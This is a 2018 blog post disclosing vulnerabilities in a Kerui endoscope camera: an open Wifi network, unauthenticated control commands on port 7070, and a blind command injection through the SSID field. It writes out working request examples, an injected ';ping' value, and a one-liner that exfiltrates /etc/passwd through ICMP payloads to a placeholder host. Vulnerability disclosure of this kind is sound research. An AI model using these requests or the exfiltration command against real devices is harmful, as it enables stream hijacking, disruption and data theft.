Multiple Vulnerabilities on Kerui Endoscope Camera

02 July 2018

Recently, I bought a device named Kerui Endoscope Camera (Model:YPC99) from Aliexpress. It’s a very popular device which is sold more than 5000 via different stores.

The package contains: Endoscope camera, Wifi device and a small user manual

Kerui Camera

Problem 1 - Unprotected Wifi Network

To use the device, you need to install an app named “y_camera” from App Store or Google Play. After starting the device, a Wifi network which starts with “endoscope” string appears.

Kerui Camera

As a first problem, this Wifi network is not password protected, also there is nothing written on user manual about setting a password. After connecting the mobile device to this Wifi, I could access to the camera’s stream.

Since the Wifi is not protected, anyone inside the Wifi’s range can watch this stream. But there also more things that they can!

Problem 2 - Missing Authentication Mechanisms

So I decompiled their Android application to see if there is some hidden functionalities. First of all, there is a RTSP server on port 7070 for streaming and it accepts various commands.

Kerui Camera

Kerui Camera

Some of these methods are written in the user manual, some of them are not. When I check the functions, I realized that there is no any authentication mechanism.

Kerui Camera

So let’s craft the “getInfo” request.

GETINFO /webcam APPO/1.0

It responds with:

APPO/1.0 200 OK
METHOD: GETINFO
SSID: endoscope
CHIP: AX3268
CHANNEL: 0
SENSOR_DIRECTION: 0
PIXEL: 0
QUALITY: 0
FRAMERATE: 0
TYPE: DRONE
VENDOR: APPOTECH
VERSION: EVJ-2_20180329

It seems “APPOTECH” company is a hardware manifacturer. Interestingly, the “TYPE” value is “DRONE”. Maybe they produced this piece of hardware for drones only.

Anyway, you can also stop the stream by sending following request:

STOP rtsp://192.168.1.1:7070/webcam/ RTSP/1.0
Range: npt=0.000-
CSeq: 4
User-Agent: Lavf57.71.100

It responds with

RTSP/1.0 200 OK
CSeq: 4
Session: E6E7E8E9EAEBECEDEEEFF0F1F2F3F4

There is also another interesting function named “setSSID”. By sending a request, you can change SSID value of the device to an any string you want. Therefore, the user will be disconnected during the stream. An example request:

SETSSID /webcam APPO/1.0
ssid:utku

It responds with:

APPO/1.0 200 OK
METHOD: SETSSID
SSID: utku
CHIP: AX3268
CHANNEL: 0
SENSOR_DIRECTION: 0
PIXEL: 0
QUALITY: 0
FRAMERATE: 0
TYPE: DRONE
VENDOR: APPOTECH
VERSION: EVJ-2_20180329

Problem 3 - Blind Remote Code Execution (Probably Not Practical)

When I play around with the “setSSID” request, I realized that I can execute commands on the device even I can’t see the output. For example when I send the following request:

SETSSID /webcam APPO/1.0
ssid:;ping 192.168.1.101

Device actually sends ICMP packets to the destination IP

Kerui Camera

Since it’s blind code execution, you can’t directly execute something like “;cat/etc/passwd” and read the output. One way to exfiltrate that data, inserting output of the “cat /etc/passwd” command into ICMP’s payload. For example a traditional command: “cat /etc/passwd | xxd -p -c 16 | while read exfil; do ping -p $exfil -c 1 xxx.xxx.xxx.xxx; done

But there is catch which makes this vulnerability impractical. Server only accepts strings which has 19 charactar at most. The reason can be the suffix of the SSID. It appends a 13 charactar lenght string as suffix. Since a SSID can be 32 character at most, it seems there is a control mechanism before the vulnerable line of code. Thefore, I couldn’t make it a practical code execution.